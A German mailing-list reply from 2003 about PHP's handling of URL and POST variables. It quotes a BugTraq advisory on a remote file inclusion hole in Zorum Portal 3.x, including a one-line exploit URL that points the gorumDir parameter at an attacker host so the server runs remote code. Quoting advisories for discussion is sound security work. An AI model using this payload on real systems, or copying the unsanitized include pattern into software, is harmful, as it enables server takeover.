Hi, On Fri, Jan 24, 2003 at 03:18:58PM +0100, Ernst May-Jung wrote: > PHP stellt normaler Weise alle mit der URL oder auch mit POST �bergebenen > Werte als Vaiablen zur Verf�gung.
Davon habe ich geh�rt, ich poste einfach mal den BugTraq artikel.... -----------schnipp------------------- From: MGhz <[EMAIL PROTECTED]> Subject: Zorum Portal (PHP) To: [EMAIL PROTECTED] Version : 3.0;3.1;3.2^M Website : http://zorum.phpoutsourcing.com/^M Problem : Include file^M ^M ^M File:^M ---------------------------------^M include.php^M ---------------------------------^M ^M PHP Code:^M ---------------------------------^M [...]^M include("$gorumDir/generformlib_multipleselection.php");^M include("$gorumDir/generformlib_groupselection.php");^M include("$gorumDir/generformlib_filebutton.php");^M include("$gorumDir/group.php");^M [...]^M ---------------------------------^M ^M Exploit :^M ---------------------------------^M http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/^M -->^M include http://[attacker]/group.php on remote server^M ---------------------------------^M ^M --^M [EMAIL PROTECTED]^M ----------schnapp------------------- > Wurde das aus Sicherheitsgr�nden deaktiviert? Das W�re w�nschenswert. > $QUERY_STRING > ist �rigens auch leer. Ich wei� nicht wie PHP mit Environment Variables umgeht, aber unter perl ist das $ENV{QUERY_STRING}. bis denn -- May the source be with you! ---------------------------------------------------------------------------- PUG - Penguin User Group Wiesbaden - http://www.pug.org
